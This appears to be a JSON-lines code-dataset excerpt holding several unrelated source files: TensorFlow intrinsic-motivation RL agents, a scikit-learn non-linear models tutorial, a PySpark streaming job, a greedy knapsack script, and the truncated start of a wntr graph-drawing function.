\"ground_arm1_left\", \"ground_arm1_right\"]\n pos_summaries, prob_summaries = [], []\n for i, name in zip(range(4), names):\n pos_summary = tf.summary.scalar(\"joints/{}_pos\".format(name), self.stochastic_actions[0, i])\n pos_summaries.append(pos_summary)\n per_joint_summaries = pos_summaries\n self.rl_summary = tf.summary.merge(per_joint_summaries)\n\n\nclass DPGJointAgentWorker(JointAgentWorker):\n def define_rl_net_dim(self):\n self.critic_net_dim = [4 + self.n_discrete * 4 * 2, 600, 1]\n self.actor_net_dim = [self.n_discrete * 2 * 4, 600, 4]\n\n def define_reinforcement_learning(self):\n #############################\n # MUST DEFINE : #############\n #############################\n # self.stochastic_actions\n # self.greedy_actions\n # self.critic_value\n # self.critic_loss\n # self.actor_loss\n # self.rl_train_op\n # self.critic_train_op\n # self.global_rl_step\n # self.rl_summary\n # PLACEHOLDERS : ############\n # self.rl_inputs\n # self.actions\n # self.return_targets_not_bootstraped\n #############################\n self.rl_inputs = tf.placeholder(shape=[None, self.actor_net_dim[0]], dtype=tf.float32, name=\"actor_inputs\")\n self.return_targets_not_bootstraped = tf.placeholder(shape=[None], dtype=tf.float32, name=\"returns_target\")\n self.actions = tf.placeholder(shape=[None, self.actor_net_dim[-1]], 
dtype=tf.float32, name=\"actions\")\n with tf.variable_scope(\"actor_net\"):\n prev_layer = self.rl_inputs\n for i, d in enumerate(self.actor_net_dim[1:]):\n activation_fn = lrelu if i < len(self.actor_net_dim) - 2 else None\n prev_layer = tl.fully_connected(prev_layer, d, scope=\"layer{}\".format(i), activation_fn=activation_fn)\n self.greedy_actions = prev_layer * 10\n self.stochastic_actions = self.greedy_actions + tf.random_normal(shape=tf.shape(self.greedy_actions), stddev=0.1)\n self.action_applied_in_env = self.greedy_actions\n actor_vars = [x for x in tf.global_variables() if x.name.startswith(\"actor_net\")]\n with tf.variable_scope(\"critic_net\"):\n prev_layer = tf.concat([self.rl_inputs, self.actions], axis=1)\n for i, d in enumerate(self.critic_net_dim[1:]):\n activation_fn = lrelu if i < len(self.critic_net_dim) - 2 else None\n prev_layer = tl.fully_connected(prev_layer, d, scope=\"layer{}\".format(i), activation_fn=activation_fn)\n self.critic_value_from_phd = tf.squeeze(prev_layer, axis=1, name=\"critic_value\")\n with tf.variable_scope(\"critic_net\"):\n prev_layer = tf.concat([self.rl_inputs, self.greedy_actions], axis=1) # could also add noise (see stochastic)\n for i, d in enumerate(self.critic_net_dim[1:]):\n activation_fn = lrelu if i < len(self.critic_net_dim) - 2 else None\n prev_layer = tl.fully_connected(prev_layer, d, scope=\"layer{}\".format(i), activation_fn=activation_fn, reuse=True)\n self.critic_value = tf.squeeze(prev_layer, axis=1, name=\"critic_value\")\n # losses\n constant_gammas = tf.fill(dims=[tf.shape(self.rl_inputs)[0]], value=self.discount_factor)\n increasing_discounted_gammas = tf.cumprod(constant_gammas, reverse=True)\n return_targets = self.return_targets_not_bootstraped + increasing_discounted_gammas * self.critic_value_from_phd[-1]\n self.critic_losses = (return_targets - self.critic_value_from_phd) ** 2 # * (1 - increasing_discounted_gammas)\n self.critic_loss = tf.reduce_mean(self.critic_losses, name=\"critic_loss\")\n self.actor_loss = -tf.reduce_mean(self.critic_value)\n # train ops\n self.global_rl_step = tf.Variable(0, dtype=tf.int32)\n self.global_rl_step_inc = self.global_rl_step.assign_add(1)\n with tf.control_dependencies([self.global_rl_step_inc]):\n self.critic_train_op = tf.train.AdamOptimizer(self.critic_lr).minimize(self.critic_loss)\n self.actor_train_op = tf.train.AdamOptimizer(self.actor_lr).minimize(self.actor_loss, var_list=actor_vars)\n with tf.control_dependencies([self.critic_train_op]):\n with tf.control_dependencies([self.actor_train_op]):\n self.rl_train_op = tf.no_op()\n # summaries\n sum_actor_loss = tf.summary.scalar(\"/rl/actor_loss\", tf.clip_by_value(-self.critic_value[0], -20, 20))\n sum_critic_loss = tf.summary.scalar(\"/rl/critic_loss\", tf.clip_by_value(self.critic_losses[0], -20, 20))\n critic_quality = tf.reduce_mean(self.critic_losses / tf.reduce_mean((return_targets - tf.reduce_mean(return_targets)) ** 2))\n sum_critic_quality = tf.summary.scalar(\"/rl/critic_quality\", tf.clip_by_value(critic_quality, -20, 20))\n names = [\"arm1_arm2_left\", \"arm1_arm2_right\", \"ground_arm1_left\", \"ground_arm1_right\"]\n grad = tf.gradients(self.critic_value, self.greedy_actions)[0]\n action_summaries, grad_summaries = [], []\n for i, name in zip(range(4), names):\n action_summary = tf.summary.scalar(\"joints/{}\".format(name), self.greedy_actions[0, i])\n action_summaries.append(action_summary)\n grad_summary = tf.summary.scalar(\"joints/{}_grad\".format(name), grad[0, i])\n grad_summaries.append(grad_summary)\n 
self.rl_summary = tf.summary.merge([sum_actor_loss, sum_critic_loss, sum_critic_quality] + grad_summaries + action_summaries)  # merge expects a flat list of summary ops\n\n\nclass PEEJointAgentWorker(JointAgentWorker):\n    def define_model_net_dim(self):\n        self.n_discrete = self.env._n_discrete\n        self.model_net_dim = [self.n_discrete * 3 * 4, 600, 600, 600, self.n_discrete]\n        self.pee_model_net_dim = [self.n_discrete * 3 * 4, 600, 1]\n\n    def define_model(self):\n        #############################\n        # MUST DEFINE : #############\n        #############################\n        # self.model_outputs\n        # self.rewards\n        # self.model_loss\n        # self.model_losses\n        # self.global_model_step\n        # self.model_train_op\n        # self.model_summary\n        # self.model_summary_at_rl_time --> missing in current ipl, TODO --> useless ?\n        # PLACEHOLDERS : ############\n        # self.model_inputs\n        # self.model_targets\n        #############################\n        net_dim = self.model_net_dim\n        self.model_inputs = tf.placeholder(shape=[None, 3, 4, self.n_discrete], dtype=tf.float32, name=\"model_inputs\")\n        self.model_targets = tf.placeholder(shape=[None, 4, self.n_discrete], dtype=tf.float32, name=\"model_targets\")\n        splited_model_inputs = [tf.reshape(x, (-1, 3 * self.n_discrete)) for x in tf.unstack(self.model_inputs, 4, axis=2)]\n        splited_model_targets = tf.unstack(self.model_targets, 4, axis=1)\n        splited_model_outputs = []\n        with tf.variable_scope(\"model\"):\n            for joint_id, inp in enumerate(splited_model_inputs):\n                prev_layer = inp\n                for i, d in enumerate(net_dim[1:]):\n                    activation_fn = lrelu if i < len(net_dim) - 2 else None\n                    prev_layer = tl.fully_connected(prev_layer, d, scope=\"joint{}_layer{}\".format(joint_id, i), activation_fn=activation_fn)\n                splited_model_outputs.append(prev_layer)\n        net_dim = self.pee_model_net_dim\n        splited_pee_model_outputs = []\n        with tf.variable_scope(\"pee_model\"):\n            for joint_id, inp in enumerate(splited_model_inputs):\n                prev_layer = inp\n                for i, d in enumerate(net_dim[1:]):\n                    activation_fn = lrelu if i < len(net_dim) - 2 else None\n                    prev_layer = tl.fully_connected(prev_layer, d, scope=\"joint{}_layer{}\".format(joint_id, i), activation_fn=activation_fn)\n                splited_pee_model_outputs.append(prev_layer)\n\n        self.pee_model_outputs = tf.concat(splited_pee_model_outputs, axis=1)  # [BS, 4]\n        self.model_outputs = tf.stack(splited_model_outputs, axis=1)  # [BS, 4, ND]\n        per_joint_model_losses = tf.reduce_mean((self.model_outputs - self.model_targets) ** 2, axis=-1)  # [BS, 4]\n        self.model_losses = tf.reduce_mean(per_joint_model_losses, axis=-1)  # [BS]\n        self.model_loss = tf.reduce_mean(self.model_losses, name=\"loss\")  # []\n        self.pee_model_losses = tf.reduce_mean((normalize(tf.stop_gradient(per_joint_model_losses), 0.95) - self.pee_model_outputs) ** 2, axis=-1)  # [BS]\n        self.pee_model_loss = tf.reduce_mean(self.pee_model_losses, name=\"pee_loss\")  # []\n        self.define_reward(**self.reward_params)\n        self.global_model_step = tf.Variable(0, dtype=tf.int32)\n        self.global_model_step_inc = self.global_model_step.assign_add(1)\n        # optimizer / summary\n        self.model_optimizer = tf.train.AdamOptimizer(self.model_lr)\n        self.model_train_op = self.model_optimizer.minimize(self.model_loss + self.pee_model_loss)\n        sum_model_loss = tf.summary.scalar(\"/model/loss\", self.model_losses[0])\n        sum_model_pee_loss = tf.summary.scalar(\"/model/pee_loss\", self.pee_model_losses[0])\n        sum_model_reward = tf.summary.scalar(\"/model/reward\", self.rewards[0])\n        self.model_summary = tf.summary.merge([sum_model_loss, sum_model_reward, sum_model_pee_loss])\n        sum_model_loss_at_rl = 
tf.summary.scalar(\"/rl/loss\", self.model_losses[0])\n sum_model_pee_loss_at_rl = tf.summary.scalar(\"/rl/pee_loss\", self.pee_model_losses[0])\n sum_model_reward_at_rl = tf.summary.scalar(\"/rl/reward\", self.rewards[0])\n self.model_summary_at_rl = tf.summary.merge([sum_model_loss_at_rl, sum_model_reward_at_rl, sum_model_pee_loss_at_rl])\n\n def define_reward(self):\n # reward_scale = (1 - self.discount_factor) / pee_model_loss_converges_to\n # self.rewards = reward_scale * self.pee_model_losses\n self.rewards = normalize(self.pee_model_losses, 0.95) * tf.sqrt(1 - self.discount_factor ** 2)\n\n\nclass MinimizeJointAgentWorker(PEJointAgentWorker):\n def define_reward(self):\n # reward_scale = (1 - self.discount_factor) / model_loss_converges_to\n # self.rewards = - reward_scale * self.model_losses\n self.rewards = - normalize(self.model_losses, 0.95) * tf.sqrt(1 - self.discount_factor ** 2)\n\n\nclass MaximizeJointAgentWorker(PEJointAgentWorker):\n def define_reward(self):\n # reward_scale = (1 - self.discount_factor) / model_loss_converges_to\n # self.rewards = reward_scale * self.model_losses\n self.rewards = normalize(self.model_losses, 0.95) * tf.sqrt(1 - self.discount_factor ** 2)\n\n\nclass MaximizeSparseJointAgentWorker(PEJointAgentWorker):\n # def define_reward(self, percent):\n # normalized_model_losses = normalize(self.model_losses, 0.95)\n # scale = np.sqrt(2) * special.erfcinv(2 * percent / 100)\n # self.rewards = tf.floor(normalized_model_losses / scale) * tf.sqrt(1 - self.discount_factor ** 2)\n\n def define_reward(self, limit):\n normalized_model_losses = normalize(self.model_losses, 0.95)\n self.rewards = tf.where(normalized_model_losses > limit,\n tf.ones_like(normalized_model_losses),\n tf.ones_like(normalized_model_losses) * (self.discount_factor - 1))\n # self.rewards = tf.sigmoid((normalized_model_losses - limit))\n\n\nclass TargetErrorJointAgentWorker(PEJointAgentWorker):\n def define_reward(self, target_prediction_error):\n # self.rewards = -tf.abs(self.model_losses - target_prediction_error) * (1 - self.discount_factor) / 0.004\n deviation = tf.abs(self.model_losses - target_prediction_error)\n self.rewards = - normalize(deviation, 0.95) * tf.sqrt(1 - self.discount_factor ** 2)\n\n\nclass RangeErrorJointAgentWorker(PEJointAgentWorker):\n def define_reward(self, range_mini, range_maxi):\n mean = (range_maxi + range_mini) / 2\n dist = (range_maxi - range_mini) / 2\n self.rewards = normalize(-tf.nn.relu(-(dist - tf.abs(self.model_losses - mean))), 0.95) * tf.sqrt(1 - self.discount_factor ** 2)\n\n\nclass Experiment:\n def __init__(self, n_parameter_servers, n_workers, WorkerCls, experiment_dir, args_env, args_worker, display_dpi=3):\n lock = filelock.FileLock(\"/home/wilmot/Documents/code/intrinsic_motivations_box2d/experiments/lock\")\n lock.acquire()\n self.n_parameter_servers = n_parameter_servers\n self.n_workers = n_workers\n self.WorkerCls = WorkerCls\n self.experiment_dir = experiment_dir\n self.mktree()\n self.cluster = get_cluster(n_parameter_servers, n_workers)\n self.args_env, self.args_worker = args_env, list(args_worker)\n self.args_worker = [self.cluster, self.logdir] + self.args_worker\n self.args_env_display = list(args_env)\n self.args_env_display[5] = display_dpi\n pipes = [multiprocessing.Pipe(True) for i in range(n_workers)]\n self.here_pipes = [a for a, b in pipes]\n self.there_pipes = [b for a, b in pipes]\n self.here_worker_pipes = [a for a, b in pipes]\n self.here_display_pipes = []\n ### DEFINE PROCESSES ###\n self.tensorboard_process = 
None\n self.chromium_process = None\n self.parameter_servers_processes = [multiprocessing.Process(\n target=self.parameter_server_func,\n args=(i,),\n daemon=True)\n for i in range(self.n_parameter_servers)]\n self.workers_processes = [multiprocessing.Process(\n target=self.worker_func,\n args=(i,),\n daemon=True)\n for i in range(self.n_workers)]\n ### start all processes ###\n all_processes = self.parameter_servers_processes + self.workers_processes\n for p in all_processes:\n p.start()\n time.sleep(5)\n lock.release()\n\n def mktree(self):\n self.logdir = self.experiment_dir + \"/log\"\n self.checkpointsdir = self.experiment_dir + \"/checkpoints\"\n self.videodir = self.experiment_dir + \"/video\"\n os.mkdir(self.experiment_dir)\n os.mkdir(self.logdir)\n os.mkdir(self.videodir)\n os.mkdir(self.checkpointsdir)\n\n def parameter_server_func(self, task_index):\n server = tf.train.Server(self.cluster, \"ps\", task_index)\n server.join()\n\n def worker_func(self, task_index):\n env = environment.Environment(*self.args_env)\n worker = self.WorkerCls(task_index, self.there_pipes[task_index], env, *self.args_worker)\n worker.wait_for_variables_initialization()\n worker()\n\n def start_tensorboard(self):\n if self.tensorboard_process is not None and self.chromium_process is not None:\n if self.tensorboard_process.is_alive() or self.chromium_process.is_alive():\n print(\"restarting tensorboard\")\n self.close_tensorboard()\n port = get_available_port()\n self.tensorboard_process = subprocess.Popen([\"tensorboard\", \"--logdir\", self.logdir, \"--port\", str(port)], stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)\n time.sleep(2)\n self.chromium_process = subprocess.Popen([\"chromium-browser\", \"http://localhost:{}\".format(port)], stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)\n\n def close_tensorboard(self):\n if self.tensorboard_process is not None and self.chromium_process is not None:\n self.tensorboard_process.terminate()\n self.chromium_process.terminate()\n\n def close_parameter_servers(self):\n for p in self.parameter_servers_processes:\n if p.is_alive():\n p.terminate()\n for p in self.parameter_servers_processes:\n while p.is_alive():\n time.sleep(0.1)\n\n def start_display_worker(self, training=True):\n self.here_display_pipes.append(self.here_worker_pipes[-1])\n self.here_worker_pipes = self.here_worker_pipes[:-1]\n self.here_display_pipes[-1].send((\"run_display\", training))\n\n def set_display_worker_idle(self):\n self.here_display_pipes[-1].send(\"done\") # quit run_display\n self.here_display_pipes[-1].recv() # waiting\n self.here_worker_pipes.append(self.here_display_pipes[-1])\n self.here_display_pipes = self.here_display_pipes[:-1]\n\n def set_all_display_workers_idle(self):\n while len(self.here_display_pipes) > 0:\n self.set_display_worker_idle()\n\n def asynchronously_run_model(self, n_updates):\n for p in self.here_worker_pipes:\n p.send((\"run_model\", n_updates))\n for p in self.here_worker_pipes:\n p.recv()\n\n def asynchronously_run_reinforcement_learning(self, n_updates, train_actor=True):\n for p in self.here_worker_pipes:\n p.send((\"run_reinforcement_learning\", n_updates, train_actor))\n for p in self.here_worker_pipes:\n p.recv()\n\n def asynchronously_run_both(self, n_updates, train_actor=True):\n for p in self.here_worker_pipes:\n p.send((\"run_all\", n_updates, train_actor))\n for p in self.here_worker_pipes:\n p.recv()\n\n def save_model(self, name):\n path = self.checkpointsdir + \"/{}/\".format(name)\n os.mkdir(path)\n 
self.here_worker_pipes[0].send((\"save\", path))\n        print(self.here_worker_pipes[0].recv())\n\n    def save_video(self, name, n_sequences, training=True):\n        path = self.videodir + \"/{}.mp4\".format(name)\n        self.here_worker_pipes[0].send((\"run_video\", path, n_sequences, training))\n        print(self.here_worker_pipes[0].recv())\n\n    def save_contact_logs(self, name):\n        for p in self.here_worker_pipes:\n            p.send((\"save_contact_logs\", name))\n        for p in self.here_worker_pipes:\n            p.recv()\n\n    def restore_model(self, path):\n        self.here_worker_pipes[0].send((\"restore\", path))\n        print(self.here_worker_pipes[0].recv())\n        # for p in self.here_worker_pipes:\n        #     p.send((\"restore\", path))\n        #     print(p.recv())\n\n    def close_workers(self):\n        for p in self.here_worker_pipes:\n            p.send(\"done\")\n\n    def close(self):\n        self.close_tensorboard()\n        self.set_all_display_workers_idle()\n        self.close_workers()\n        self.close_parameter_servers()\n\n    def __enter__(self):\n        return self\n\n    def __exit__(self, type, value, traceback):\n        self.close()\n","repo_name":"charleswilmot/intrinsic_motivations_box2d","sub_path":"src/asynchronous.py","file_name":"asynchronous.py","file_ext":"py","file_size_in_byte":56916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"12599953445","text":"'''\nNon-linear models\n=================\n\nHere we focus on non-linear models for classification. Nevertheless, each\nclassification model has its regression counterpart.\n'''\n\n# get_ipython().run_line_magic('matplotlib', 'inline')\nimport matplotlib.pyplot as plt\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nfrom sklearn.svm import SVC\nfrom sklearn.preprocessing import StandardScaler\n\nfrom sklearn import datasets\nfrom sklearn import metrics\nfrom sklearn.model_selection import train_test_split\n\nnp.set_printoptions(precision=2)\npd.set_option('precision', 2)\n\n# %%\n# Support Vector Machines (SVM)\n# -----------------------------\n#\n# SVMs are kernel methods: they require only a user-specified kernel function\n# :math:`K(x_i, x_j)`, i.e., a **similarity function** over pairs of data\n# points :math:`(x_i, x_j)`, mapped into a kernel (dual) space in which\n# learning algorithms operate linearly, i.e. every operation on points is a\n# linear combination of :math:`K(x_i, x_j)`.\n# Outline of the SVM algorithm:\n#\n# 1. Map points :math:`x` into kernel space using a kernel function:\n#    :math:`x \\rightarrow K(x, .)`.\n# 2. Learning algorithms operate linearly by dot products in the high-dimensional kernel\n#    space :math:`K(., x_i) \\cdot K(., x_j)`.\n#    - Using the kernel trick (Mercer’s Theorem), the dot product in high\n#      dimensional space is replaced by a simpler operation such that\n#      :math:`K(., x_i) \\cdot K(., x_j) = K(x_i, x_j)`.\n#      Thus we only need to compute a similarity measure for each pair of\n#      points and store it in an :math:`N \\times N` Gram matrix.\n#    - Finally, the learning process consists of estimating the :math:`\\alpha_i` of\n#      the decision function that minimises the hinge loss (of :math:`f(x)`)\n#      plus some penalty when applied on all training points.\n#\n# .. math::\n#\n#      f(x) = \\text{sign} \\left(\\sum_i^N \\alpha_i~y_i~K(x_i, x)\\right).\n#\n# 3. Predict a new point :math:`x` using the decision function.\n
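\n# %%\n# A quick numerical illustration (an added sketch, not part of the original\n# outline): the kernel acts as a similarity measure between two points. Below\n# we evaluate the RBF kernel introduced in the next section both by hand and\n# with scikit-learn's ``rbf_kernel`` helper; the value of ``gamma`` here is an\n# arbitrary choice for the example.\n\nfrom sklearn.metrics.pairwise import rbf_kernel\n\nxi = np.array([[1.0, 2.0]])\nxj = np.array([[2.0, 0.0]])\ngamma = 0.1\n# ||xi - xj||^2 = (1 - 2)^2 + (2 - 0)^2 = 5, hence K = exp(-0.5) ~= 0.61\nprint(np.exp(-gamma * np.sum((xi - xj) ** 2)))\nprint(rbf_kernel(xi, xj, gamma=gamma))\n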
figure:: ../images/svm_rbf_kernel_mapping_and_decision_function.png\n#   :alt: Support Vector Machines.\n#\n# Gaussian kernel (RBF, Radial Basis Function):\n#\n# One of the most commonly used kernels is the Radial Basis Function (RBF) kernel.\n# For a pair of points :math:`x_i, x_j` the RBF kernel is defined as:\n#\n# .. raw:: latex\n#\n#    \\begin{align}\n#       K(x_i, x_j) &= \\exp\\left(-\\frac{\\|x_i - x_j\\|^2}{2\\sigma^2}\\right)\\\\\n#       &= \\exp\\left(-\\gamma~\\|x_i - x_j\\|^2\\right)\n#    \\end{align}\n#\n# Where :math:`\\sigma` (or :math:`\\gamma`) defines the kernel width parameter.\n# Basically, we consider a Gaussian function centered on each training sample\n# :math:`x_i`. It has a ready interpretation as a similarity measure, as it\n# decreases with the squared Euclidean distance between the two feature vectors.\n#\n# Non-linear SVMs also exist for regression problems.\n\n\n# %%\n# Dataset\n\nX, y = datasets.load_breast_cancer(return_X_y=True)\nX_train, X_test, y_train, y_test = \\\n    train_test_split(X, y, test_size=0.5, stratify=y, random_state=42)\n\n# %%\n# Preprocessing: unequal variance of input features requires scaling for SVM.\n\nax = sns.displot(x=X_train.std(axis=0), kind=\"kde\", bw_adjust=.2, cut=0,\n                 fill=True, height=3, aspect=1.5,)\n_ = ax.set_xlabels(\"Std-dev\").tight_layout()\n\n# Fit the scaler on the training set only, then apply it to the test set to avoid data leakage\nscaler = StandardScaler()\nX_train = scaler.fit_transform(X_train)\nX_test = scaler.transform(X_test)\n\n# %%\n# Fit-predict\n# Probability is a logistic function of the decision_function\n\nsvm = SVC(kernel='rbf', probability=True).fit(X_train, y_train)\ny_pred = svm.predict(X_test)\ny_score = svm.decision_function(X_test)\ny_prob = svm.predict_proba(X_test)[:, 1]\n\nax = sns.relplot(x=y_score, y=y_prob, hue=y_pred, height=2, aspect=1.5)\n_ = ax.set_axis_labels(\"decision function\", \"Probability\").tight_layout()\n\n# %% Scores\n\nprint(\"bAcc: %.2f, AUC: %.2f (AUC with proba: %.2f)\" % (\n    metrics.balanced_accuracy_score(y_true=y_test, y_pred=y_pred),\n    metrics.roc_auc_score(y_true=y_test, y_score=y_score),\n    metrics.roc_auc_score(y_true=y_test, y_score=y_prob)))\n\n# Useful internals: indices of support vectors within original X\nnp.all(X_train[svm.support_, :] == svm.support_vectors_)\n\n\n# %%\n# Random forest\n# -------------\n#\n# Decision tree\n# ~~~~~~~~~~~~~\n#\n# A tree can be \"learned\" by splitting the training dataset into subsets based on a feature value test.\n# Each internal node represents a \"test\" on a feature resulting in a split of the current sample. At each step the algorithm selects the feature and a cutoff value that maximises a given metric. Different metrics exist for regression trees (the target is continuous) and classification trees (the target is qualitative).\n# This process is repeated on each derived subset in a recursive manner called recursive partitioning. The recursion is completed when the subset at a node has all the same value of the target variable, or when splitting no longer adds value to the predictions. This general principle is implemented by many recursive partitioning tree algorithms.\n#\n# .. figure:: ../images/classification_tree.png\n#   :width: 400\n#   :alt: Classification tree.\n#\n# Decision trees are simple to understand and interpret; however, they tend to overfit the training set. Leo Breiman proposed random forests to deal with this issue.\n#\n# A single decision tree usually overfits the data it is learning from because it learns from only one pathway of decisions. 
Predictions from a single decision tree are therefore usually not accurate on new data.\n#\n# Forest\n# ~~~~~~\n#\n# A random forest is a meta estimator that fits a number of **decision tree learners** on various sub-samples of the dataset and uses averaging to improve the predictive accuracy and control over-fitting.\n# Random forest models reduce the risk of overfitting by introducing randomness by:\n#\n# .. figure:: ../images/random_forest.png\n#   :width: 300\n#   :alt: Random forest.\n#\n# - building multiple trees (n_estimators)\n# - drawing observations with replacement (i.e., a bootstrapped sample)\n# - splitting nodes on the best split among a random subset of the features selected at every node\n#\n\nfrom sklearn.ensemble import RandomForestClassifier\n\nforest = RandomForestClassifier(n_estimators = 100)\nforest.fit(X_train, y_train)\n\ny_pred = forest.predict(X_test)\ny_prob = forest.predict_proba(X_test)[:, 1]\n\n\n# %% Scores\n\nprint(\"bAcc: %.2f, AUC: %.2f \" % (\n    metrics.balanced_accuracy_score(y_true=y_test, y_pred=y_pred),\n    metrics.roc_auc_score(y_true=y_test, y_score=y_prob)))\n\n# %%\n# Extra Trees (Low Variance)\n#\n# Extra Trees is like Random Forest, in that it builds multiple trees and splits nodes using random subsets of features, but with two key differences: it does not bootstrap observations (meaning it samples without replacement), and nodes are split on random splits, not best splits. So, in summary, ExtraTrees:\n#\n# - builds multiple trees with bootstrap = False by default, which means it samples without replacement\n# - nodes are split based on random splits among a random subset of the features selected at every node\n#\n# In Extra Trees, randomness doesn’t come from bootstrapping of data, but rather comes from the random splits of all observations.\n# The name ExtraTrees stands for Extremely Randomized Trees.\n\n\n# %%\n# Gradient boosting\n# -----------------\n# \n# Gradient boosting is a meta estimator that fits a sequence of **weak learners**.\n# Each learner aims to reduce the residuals (errors) produced by the previous learner.\n# The two main hyper-parameters are:\n#\n# - The **learning rate** (*lr*) controls over-fitting:\n#   decreasing the *lr* limits the capacity of a learner to overfit the residuals, i.e.,\n#   it slows down the learning speed and thus increases the **regularisation**. \n#\n# - The **sub-sampling fraction** controls the fraction of samples to be used for\n#   fitting the learners. Values smaller than 1 lead to **Stochastic Gradient Boosting**.\n#   It thus controls over-fitting, reducing variance and increasing bias.\n#\n# .. 
figure:: ../images/gradient_boosting.png\n# :width: 500\n# :alt: Gradient boosting.\n#\n\n\nfrom sklearn.ensemble import GradientBoostingClassifier\n\ngb = GradientBoostingClassifier(n_estimators=100, learning_rate=0.1,\n subsample=0.5, random_state=0)\ngb.fit(X_train, y_train)\n\ny_pred = gb.predict(X_test)\ny_prob = gb.predict_proba(X_test)[:, 1]\n\nprint(\"bAcc: %.2f, AUC: %.2f \" % (\n metrics.balanced_accuracy_score(y_true=y_test, y_pred=y_pred),\n metrics.roc_auc_score(y_true=y_test, y_score=y_prob)))\n","repo_name":"neurospin/pystatsml","sub_path":"machine_learning/ml_supervized_nonlinear.py","file_name":"ml_supervized_nonlinear.py","file_ext":"py","file_size_in_byte":8577,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"6"} +{"seq_id":"1164432622","text":"from pyspark.sql import SparkSession, SQLContext\nfrom pyspark.sql.functions import col, expr, struct, lit, concat, array, date_format, current_timestamp\nfrom pyspark.sql.avro.functions import to_avro\n\nspark = SparkSession \\\n .builder \\\n .appName(\"ConsolidarBaseEventosJob\") \\\n .master(\"local[*]\") \\\n .getOrCreate()\n\nspark.sparkContext.setLogLevel('WARN')\n\nspark.readStream \\\n .format(\"parquet\") \\\n .schema(spark.read.parquet(\"D:\\\\s3\\\\efinanceira-monitoracao-transmissao\\\\bkt-staging-data\").schema) \\\n .option(\"path\", \"D:\\\\s3\\\\efinanceira-monitoracao-transmissao\\\\bkt-staging-data\") \\\n .load() \\\n .writeStream \\\n .partitionBy(\"date\") \\\n .format(\"parquet\") \\\n .outputMode(\"append\") \\\n .option(\"path\", \"D:\\\\s3\\\\efinanceira-monitoracao-transmissao\\\\bkt-raw-data\") \\\n .option(\"checkpointLocation\", \"D:\\\\s3\\\\efinanceira-monitoracao-transmissao\\\\bkt-checkpoint-data\\\\consolidar-base-eventos-job\") \\\n .trigger(once=True) \\\n .start() \\\n .awaitTermination()","repo_name":"LeonardoZV/spark-structured-streaming-python-examples","sub_path":"apache-kafka/scripts/consolidar_base_eventos_job.py","file_name":"consolidar_base_eventos_job.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"3019010087","text":"\n\ndef getBestItem(d,candidates):\n bestItem = -1\n bestIndex = -1\n\n for c in candidates:\n best = d[\"profit\"][c] / d[\"risk\"][c]\n if best > bestItem:\n bestItem = best\n bestIndex = c\n\n return bestIndex\n\n\ndef knapsack(d):\n n = len(d[\"name\"])\n candidates = set()\n isSol = False\n sol = []\n\n for i in range(n):\n candidates.add(i)\n\n while not isSol and candidates:\n bestCand = getBestItem(d,candidates)\n candidates.remove(bestCand)\n\n if d[\"risk\"][bestCand] <= d[\"max_risk\"]:\n sol.append(d[\"name\"][bestCand])\n d[\"max_risk\"] -= d[\"risk\"][bestCand]\n else:\n isSol = True\n sol.append(d[\"name\"][bestCand])\n\n return sol\n\n\nif __name__ == '__main__':\n\n N,M = map(int,input().strip().split())\n\n d = {\n \"name\" : [],\n \"risk\" : [],\n \"profit\" : [],\n \"max_risk\" : M\n }\n\n for _ in range(N):\n var = input()\n C, R, B = var.strip().split()\n d[\"name\"].append(C)\n d[\"risk\"].append(int(R))\n d[\"profit\"].append(int(B))\n\n sol = knapsack(d)\n print(*sol)","repo_name":"medranoGG/AlgorithmsPython","sub_path":"03.Voraces/03explodingKittens.py","file_name":"03explodingKittens.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"39348245520","text":"import networkx as nx\ntry:\n import 
matplotlib.pyplot as plt\n    from matplotlib.colors import LinearSegmentedColormap\nexcept:\n    pass\nimport pandas as pd\nimport logging\n\nlogger = logging.getLogger('wntr.network.draw_graph')\n\ndef draw_graph(wn, node_attribute=None, link_attribute=None, title=None, \n               node_size=10, node_range = [None,None], node_cmap=None,\n               link_width=1, link_range = [None,None], link_cmap=None, \n               add_colorbar=True, figsize=None, dpi=None, directed=False, node_labels=False,plt_fig=None):\n\n    r\"\"\"Draw a WaterNetworkModel networkx graph\n    \n    Parameters\n    ----------\n    wn : WaterNetworkModel\n        A WaterNetworkModel object\n    \n    node_attribute : str, list, pd.Series, or dict, optional \n        (default = None)\n        \n        - If node_attribute is a string, then the node_attribute dictionary is \n          populated using node_attribute = wn.query_node_attribute(str)\n        - If node_attribute is a list, then each node is given a value of 1.\n        - If node_attribute is a pd.Series, then it should be in the format\n          {(nodeid,time): x} or {nodeid: x} where nodeid is a string and x is a float. \n          The time index is not used in the plot.\n        - If node_attribute is a dict, then it should be in the format\n          {nodeid: x} where nodeid is a string and x is a float\n        \n    link_attribute : str, list, pd.Series, or dict, optional \n        (default = None)\n        \n        - If link_attribute is a string, then the link_attribute dictionary is \n          populated using edge_attribute = wn.query_link_attribute(str)\n        - If link_attribute is a list, then each link is given a value of 1.\n        - If link_attribute is a pd.Series, then it should be in the format\n          {(linkid,time): x} or {linkid: x} where linkid is a string and x is a float. \n          The time index is not used in the plot.\n        - If link_attribute is a dict, then it should be in the format\n          {linkid: x} where linkid is a string and x is a float. 
\n    \n    title : str, optional \n        (default = None)\n        \n    node_size : int, optional \n        (default = 10)\n        \n    node_range : list, optional \n        (default = [None,None])\n        \n    node_cmap : matplotlib.pyplot.cm colormap, optional \n        (default = jet)\n        \n    link_width : int, optional \n        (default = 1)\n        \n    link_range : list, optional \n        (default = [None,None])\n        \n    link_cmap : matplotlib.pyplot.cm colormap, optional \n        (default = jet)\n        \n    add_colorbar : bool, optional \n        (default = True)\n        \n    directed : bool, optional \n        (default = False)\n\n    node_labels: bool, optional\n        If True, the graph will have each node labeled with its name.\n        (default = False)\n    \n    Returns\n    -------\n    Figure\n    \n    Examples\n    --------\n    >>> wn = en.network.WaterNetworkModel('Net1.inp')\n    >>> en.network.draw_graph(wn)\n\n    Notes\n    -----\n    For more network draw options, see nx.draw_networkx\n    \n    \"\"\"\n    if plt_fig is None:\n        